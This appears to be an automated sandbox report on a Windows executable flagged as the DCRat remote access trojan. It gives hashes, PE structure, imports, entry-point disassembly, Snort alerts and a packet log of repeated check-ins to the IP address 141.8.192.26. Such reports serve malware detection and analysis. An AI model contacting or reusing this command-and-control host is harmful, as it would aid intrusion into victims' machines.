SHA512:	ec324bc9425a2d1b20449d476c6b188a83025009fd7accce544ca86769578c41b2b020cb16d7434a0707a9a1326d0106f701de4d265aaeb6988a8b17a8dcdc37
SSDEEP:	24576:h2G/nvxW3WT00jPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOvk:hbA3Z0jGh8IT0G2jbtTO8
TLSH:	C0858D017E40C951F0592673C2AF520847B49D112BA6E31BBEA93B7EB5363933D1E9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	363627270d99191c

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FED3D177C99h
jmp 00007FED3D1776ADh
cmp ecx, dword ptr [0043E668h]
jne 00007FED3D177825h
ret
jmp 00007FED3D177E1Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FED3D16A5B7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007FED3D17A9BDh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FED3D16A54Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FED3D17A0D2h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FED3D1777C4h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FED3D17A0B5h
int3
jmp 00007FED3D17C103h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x46968	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0x46968	0x46a00	83942b3b08a4ead17ecb00803233bc5d	False	0.11983199668141593	data	1.7576868395608836	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6406c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65618	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m			0.08164556025682752
RT_DIALOG	0xa7640	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0xa78c8	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0xa7a04	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0xa7af0	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0xa7c20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0xa7f58	0x252	data	English	United States	0.5757575757575758
RT_STRING	0xa81ac	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0xa8390	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0xa855c	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0xa8714	0x146	data	English	United States	0.5153374233128835
RT_STRING	0xa885c	0x446	data	English	United States	0.340036563071298
RT_STRING	0xa8ca4	0x166	data	English	United States	0.49162011173184356
RT_STRING	0xa8e0c	0x152	data	English	United States	0.5059171597633136
RT_STRING	0xa8f60	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0xa906c	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0xa9128	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0xa9200	0x14	data			1.1
RT_MANIFEST	0xa9214	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/24/24-11:07:09.472406	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49730	141.8.192.26	192.168.2.4
05/24/24-11:08:12.793523	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49749	141.8.192.26	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 11:07:08.119596004 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:08.124914885 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:08.125020027 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:08.125503063 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:08.177423954 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:08.907716036 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:08.912414074 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:08.912501097 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.140894890 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.141990900 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.150110006 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.199326038 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.199376106 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.200124025 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.200311899 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.211114883 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.472405910 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.634879112 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.894076109 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.899847984 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.899969101 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.906620979 CEST	80	49730	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.906685114 CEST	49730	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:09.955445051 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:09.955482960 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:10.118223906 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:10.166050911 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.480415106 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.485656977 CEST	80	49731	141.8.192.26	192.168.2.4
May 24, 2024 11:07:14.485723019 CEST	49731	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.489511013 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.552478075 CEST	80	49732	141.8.192.26	192.168.2.4
May 24, 2024 11:07:14.552676916 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.552726984 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:14.557945967 CEST	80	49732	141.8.192.26	192.168.2.4
May 24, 2024 11:07:14.607413054 CEST	80	49732	141.8.192.26	192.168.2.4
May 24, 2024 11:07:15.258023024 CEST	80	49732	141.8.192.26	192.168.2.4
May 24, 2024 11:07:15.306677103 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.277283907 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.277287006 CEST	49739	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.282746077 CEST	80	49732	141.8.192.26	192.168.2.4
May 24, 2024 11:07:20.282881021 CEST	49732	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.287614107 CEST	80	49739	141.8.192.26	192.168.2.4
May 24, 2024 11:07:20.288077116 CEST	49739	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.288510084 CEST	49739	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:20.293598890 CEST	80	49739	141.8.192.26	192.168.2.4
May 24, 2024 11:07:20.339272022 CEST	80	49739	141.8.192.26	192.168.2.4
May 24, 2024 11:07:21.089430094 CEST	80	49739	141.8.192.26	192.168.2.4
May 24, 2024 11:07:21.090197086 CEST	49739	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:21.095792055 CEST	80	49739	141.8.192.26	192.168.2.4
May 24, 2024 11:07:21.095850945 CEST	49739	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:26.105052948 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:26.110063076 CEST	80	49740	141.8.192.26	192.168.2.4
May 24, 2024 11:07:26.110198021 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:26.110286951 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:26.115190029 CEST	80	49740	141.8.192.26	192.168.2.4
May 24, 2024 11:07:26.163312912 CEST	80	49740	141.8.192.26	192.168.2.4
May 24, 2024 11:07:26.794965029 CEST	80	49740	141.8.192.26	192.168.2.4
May 24, 2024 11:07:26.838027000 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.807475090 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.808784962 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.812814951 CEST	80	49740	141.8.192.26	192.168.2.4
May 24, 2024 11:07:31.812860012 CEST	49740	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.817641020 CEST	80	49741	141.8.192.26	192.168.2.4
May 24, 2024 11:07:31.817708969 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.817857027 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:31.822714090 CEST	80	49741	141.8.192.26	192.168.2.4
May 24, 2024 11:07:31.871221066 CEST	80	49741	141.8.192.26	192.168.2.4
May 24, 2024 11:07:32.531474113 CEST	80	49741	141.8.192.26	192.168.2.4
May 24, 2024 11:07:32.587893963 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.541625977 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.542526960 CEST	49742	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.547148943 CEST	80	49741	141.8.192.26	192.168.2.4
May 24, 2024 11:07:37.547321081 CEST	49741	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.554043055 CEST	80	49742	141.8.192.26	192.168.2.4
May 24, 2024 11:07:37.554383993 CEST	49742	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.554546118 CEST	49742	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:37.559493065 CEST	80	49742	141.8.192.26	192.168.2.4
May 24, 2024 11:07:37.611313105 CEST	80	49742	141.8.192.26	192.168.2.4
May 24, 2024 11:07:38.248681068 CEST	80	49742	141.8.192.26	192.168.2.4
May 24, 2024 11:07:38.291030884 CEST	49742	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:43.261418104 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:43.266767025 CEST	80	49743	141.8.192.26	192.168.2.4
May 24, 2024 11:07:43.266855001 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:43.267050028 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:43.275945902 CEST	80	49743	141.8.192.26	192.168.2.4
May 24, 2024 11:07:43.327967882 CEST	80	49743	141.8.192.26	192.168.2.4
May 24, 2024 11:07:44.102874041 CEST	80	49743	141.8.192.26	192.168.2.4
May 24, 2024 11:07:44.150392056 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.104279995 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.105093956 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.110399961 CEST	80	49743	141.8.192.26	192.168.2.4
May 24, 2024 11:07:49.110496998 CEST	49743	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.115241051 CEST	80	49744	141.8.192.26	192.168.2.4
May 24, 2024 11:07:49.115329981 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.115508080 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:49.120515108 CEST	80	49744	141.8.192.26	192.168.2.4
May 24, 2024 11:07:49.171308041 CEST	80	49744	141.8.192.26	192.168.2.4
May 24, 2024 11:07:49.818958044 CEST	80	49744	141.8.192.26	192.168.2.4
May 24, 2024 11:07:49.869234085 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.822993040 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.824315071 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.829982042 CEST	80	49744	141.8.192.26	192.168.2.4
May 24, 2024 11:07:54.830049038 CEST	49744	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.834846020 CEST	80	49745	141.8.192.26	192.168.2.4
May 24, 2024 11:07:54.834914923 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.835216045 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:07:54.840605021 CEST	80	49745	141.8.192.26	192.168.2.4
May 24, 2024 11:07:54.887295961 CEST	80	49745	141.8.192.26	192.168.2.4
May 24, 2024 11:07:55.513802052 CEST	80	49745	141.8.192.26	192.168.2.4
May 24, 2024 11:07:55.556760073 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.526547909 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.527956963 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.538017035 CEST	80	49745	141.8.192.26	192.168.2.4
May 24, 2024 11:08:00.538104057 CEST	49745	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.542859077 CEST	80	49747	141.8.192.26	192.168.2.4
May 24, 2024 11:08:00.542946100 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.543112993 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:00.548307896 CEST	80	49747	141.8.192.26	192.168.2.4
May 24, 2024 11:08:00.599512100 CEST	80	49747	141.8.192.26	192.168.2.4
May 24, 2024 11:08:01.238668919 CEST	80	49747	141.8.192.26	192.168.2.4
May 24, 2024 11:08:01.292881012 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.245045900 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.246357918 CEST	49748	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.251701117 CEST	80	49747	141.8.192.26	192.168.2.4
May 24, 2024 11:08:06.251801014 CEST	49747	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.257675886 CEST	80	49748	141.8.192.26	192.168.2.4
May 24, 2024 11:08:06.257781029 CEST	49748	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.257934093 CEST	49748	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:06.263983965 CEST	80	49748	141.8.192.26	192.168.2.4
May 24, 2024 11:08:06.312273026 CEST	80	49748	141.8.192.26	192.168.2.4
May 24, 2024 11:08:06.942858934 CEST	80	49748	141.8.192.26	192.168.2.4
May 24, 2024 11:08:06.994179010 CEST	49748	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:08.286454916 CEST	80	49742	141.8.192.26	192.168.2.4
May 24, 2024 11:08:08.286644936 CEST	49742	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:11.948689938 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:12.114819050 CEST	80	49749	141.8.192.26	192.168.2.4
May 24, 2024 11:08:12.115185022 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:12.115185022 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:12.122534990 CEST	80	49749	141.8.192.26	192.168.2.4
May 24, 2024 11:08:12.173036098 CEST	80	49749	141.8.192.26	192.168.2.4
May 24, 2024 11:08:12.793523073 CEST	80	49749	141.8.192.26	192.168.2.4
May 24, 2024 11:08:12.838093042 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.807725906 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.808289051 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.813745022 CEST	80	49749	141.8.192.26	192.168.2.4
May 24, 2024 11:08:17.814799070 CEST	49749	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.818411112 CEST	80	49750	141.8.192.26	192.168.2.4
May 24, 2024 11:08:17.818818092 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.818942070 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:17.823983908 CEST	80	49750	141.8.192.26	192.168.2.4
May 24, 2024 11:08:17.875650883 CEST	80	49750	141.8.192.26	192.168.2.4
May 24, 2024 11:08:18.619081974 CEST	80	49750	141.8.192.26	192.168.2.4
May 24, 2024 11:08:18.665997982 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.635267973 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.636393070 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.640731096 CEST	80	49750	141.8.192.26	192.168.2.4
May 24, 2024 11:08:23.640789032 CEST	49750	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.691778898 CEST	80	49751	141.8.192.26	192.168.2.4
May 24, 2024 11:08:23.692781925 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.692904949 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:23.702884912 CEST	80	49751	141.8.192.26	192.168.2.4
May 24, 2024 11:08:23.755714893 CEST	80	49751	141.8.192.26	192.168.2.4
May 24, 2024 11:08:24.397114038 CEST	80	49751	141.8.192.26	192.168.2.4
May 24, 2024 11:08:24.447257996 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.401130915 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.402393103 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.407566071 CEST	80	49751	141.8.192.26	192.168.2.4
May 24, 2024 11:08:29.407661915 CEST	49751	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.412283897 CEST	80	49752	141.8.192.26	192.168.2.4
May 24, 2024 11:08:29.412425995 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.412646055 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:29.417646885 CEST	80	49752	141.8.192.26	192.168.2.4
May 24, 2024 11:08:29.467432976 CEST	80	49752	141.8.192.26	192.168.2.4
May 24, 2024 11:08:30.136791945 CEST	80	49752	141.8.192.26	192.168.2.4
May 24, 2024 11:08:30.181632996 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.428920031 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.429868937 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.434556007 CEST	80	49752	141.8.192.26	192.168.2.4
May 24, 2024 11:08:35.434695959 CEST	49752	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.439203024 CEST	80	49753	141.8.192.26	192.168.2.4
May 24, 2024 11:08:35.439284086 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.439461946 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:35.444859028 CEST	80	49753	141.8.192.26	192.168.2.4
May 24, 2024 11:08:35.501300097 CEST	80	49753	141.8.192.26	192.168.2.4
May 24, 2024 11:08:36.131242037 CEST	80	49753	141.8.192.26	192.168.2.4
May 24, 2024 11:08:36.197318077 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:36.955503941 CEST	80	49748	141.8.192.26	192.168.2.4
May 24, 2024 11:08:36.955650091 CEST	49748	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.293788910 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.293788910 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.300014973 CEST	80	49753	141.8.192.26	192.168.2.4
May 24, 2024 11:08:42.300187111 CEST	49753	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.352083921 CEST	80	49754	141.8.192.26	192.168.2.4
May 24, 2024 11:08:42.357044935 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.357044935 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:42.362235069 CEST	80	49754	141.8.192.26	192.168.2.4
May 24, 2024 11:08:42.411375999 CEST	80	49754	141.8.192.26	192.168.2.4
May 24, 2024 11:08:43.040803909 CEST	80	49754	141.8.192.26	192.168.2.4
May 24, 2024 11:08:43.087869883 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.057905912 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.057905912 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.063257933 CEST	80	49755	141.8.192.26	192.168.2.4
May 24, 2024 11:08:48.067573071 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.067573071 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.070586920 CEST	80	49754	141.8.192.26	192.168.2.4
May 24, 2024 11:08:48.074728966 CEST	49754	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:48.078594923 CEST	80	49755	141.8.192.26	192.168.2.4
May 24, 2024 11:08:48.084745884 CEST	80	49755	141.8.192.26	192.168.2.4
May 24, 2024 11:08:48.759102106 CEST	80	49755	141.8.192.26	192.168.2.4
May 24, 2024 11:08:48.807233095 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.760354042 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.761580944 CEST	49756	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.766186953 CEST	80	49755	141.8.192.26	192.168.2.4
May 24, 2024 11:08:53.766237974 CEST	49755	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.771387100 CEST	80	49756	141.8.192.26	192.168.2.4
May 24, 2024 11:08:53.771461964 CEST	49756	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.771653891 CEST	49756	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:53.777131081 CEST	80	49756	141.8.192.26	192.168.2.4
